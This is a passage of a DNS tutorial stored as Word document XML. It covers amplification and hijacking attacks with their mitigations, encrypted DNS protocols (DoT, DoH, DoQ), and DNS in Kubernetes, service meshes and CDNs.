    <w:p w14:paraId="2E67EC72" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A botnet sending 1Gbps of DNS queries can generate </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100Gbps of traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> at the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E6AF4C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFE74E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response Rate Limiting (RRL):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Nameservers rate-limit responses to the same source IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB95601" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BCP38 (Network Ingress Filtering):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> ISPs should block packets with spoofed source IPs. Widely recommended, poorly adopted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642546D1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response size limits:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Reduce maximum UDP response size, force TCP for large responses (TCP requires connection state, making IP spoofing impossible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051AB3B2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C5920" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Attackers compromise the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authoritative nameserver</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> or the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS registrar account</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> and change NS or A records directly. This is more devastating than cache poisoning — it's not a cache attack, it's the actual authoritative data being corrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A419F0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Real-world examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983C2AA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Brazilian banking attack (2017):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Attackers compromised a Brazilian bank's DNS registrar account, changed NS records to their own servers for 5 hours. All visitors to the bank's sites were served attacker-controlled content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECFA941" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BGP hijacking + DNS:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Attackers hijack BGP routes to MITM traffic to DNS servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D16FA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Registry Lock (requires phone/physical verification to change NS records), DNSSEC, multi-factor authentication on registrar accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887521B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="3E91961B">
          <v:rect id="_x0000_i3178" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A65B51E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Encrypted DNS — DoT, DoH, DoQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE21B89" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Traditional DNS is </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>completely plaintext</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. Every DNS query is visible to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F47363A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Your ISP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F838CB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Network administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A7A8F9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Anyone on the same WiFi network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A4182" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>National-level surveillance systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157FE52E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Your browsing history is entirely reconstructible from DNS queries even if all HTTPS traffic is encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6687DE17" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS over TLS (DoT) — Port 853</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05600408" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The resolver opens a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>persistent TLS connection</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> to a DoT-capable recursive resolver (e.g., 1.1.1.1:853). DNS queries are sent over this encrypted channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F875B0E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internals:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Standard TLS 1.3 handshake, then DNS queries/responses sent as length-prefixed messages (same TCP DNS framing: 2-byte length prefix + DNS message). Connection is kept alive across multiple queries (connection reuse amortizes TLS handshake cost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BD121D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Port 853 is easily </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>identifiable and blockable</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> by firewalls. The encrypted content is hidden but the fact that you're making DNS queries is obvious from the port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C96D5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS over HTTPS (DoH) — Port 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E36157" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS queries are sent as </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS requests</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> to a DoH endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1A1919" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4041D3C3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>GET /dns-query?dns=&lt;base64-encoded-DNS-query&gt; HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865A719" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Host: cloudflare-dns.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC839F5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Accept: application/dns-message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264379B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Or as POST with binary DNS message body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B619B6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internals:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Uses HTTP/2 or HTTP/3. DNS traffic is </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>indistinguishable from regular HTTPS traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> on port 443. Extremely firewall-resistant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A05443F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Controversy:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> DoH is built into browsers (Firefox, Chrome). When a browser makes DoH queries directly to 1.1.1.1 or 8.8.8.8, it </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bypasses the OS resolver</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> and any corporate DNS policies, parental controls, or security filtering. This creates tension between user privacy and network administration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717D24C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DNS over QUIC (DoQ) — Port 853</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EB63EF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Newest standard. Uses QUIC (the protocol underlying HTTP/3) for DNS transport. Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6595C0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="615"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0-RTT connection establishment</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> for repeated queries to the same resolver (QUIC's 0-RTT feature).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402EBCFE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="615"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No head-of-line blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (QUIC multiplexes queries over UDP, individual packet loss doesn't stall other queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1538BC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="615"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Built-in encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (QUIC always encrypts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352E63AE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="72386C1D">
          <v:rect id="_x0000_i3179" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB2ECD1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. DNS in Modern Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E33E944" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kubernetes DNS (CoreDNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4888994A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>In Kubernetes, every pod gets DNS resolution via </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CoreDNS</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>, which runs as a cluster-internal recursive resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D7F94" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service DNS pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4267B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A053517" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>my-service.my-namespace.svc.cluster.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2AFA9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>CoreDNS intercepts queries for *.cluster.local and resolves them to </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ClusterIP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> from the Kubernetes service registry (etcd). External queries are forwarded to the node's configured DNS resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9CD5A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Search domains:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Each pod has ndots:5 set, meaning if a hostname has fewer than 5 dots, the OS appends search domain suffixes before trying the bare name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3798D6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EF2AD9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Query for "redis":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4BBBB7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  1. redis.my-namespace.svc.cluster.local → found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D6979" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>This allows pods to use short service names (redis instead of redis.my-namespace.svc.cluster.local).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B740286" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Headless services</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (ClusterIP = None): CoreDNS returns </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>individual pod IPs</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> instead of a single ClusterIP. Used for stateful sets where clients need to connect to specific pods. The DNS response contains multiple A records — one per pod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91B808" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Mesh DNS (Istio, Linkerd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4DCD38" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Service meshes intercept DNS at the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sidecar proxy level</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. All DNS queries are resolved through the mesh control plane. This enables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6ADAB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Traffic policies enforced at the DNS layer (canary routing, A/B testing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01482C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Service discovery integrated with the mesh's service registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253A8BAA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS in CDN Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CBDC4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>When you set your domain's NS to Cloudflare or Fastly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD8ED35" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cloudflare becomes your </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authoritative nameserver</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1610DE67" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cloudflare's nameservers run on </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — dozens of globally distributed nodes all answer for your domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2030C839" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geographic routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Cloudflare's authoritatives return different IPs based on where the recursive resolver is located — routing users to the nearest CDN edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7DEC08" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
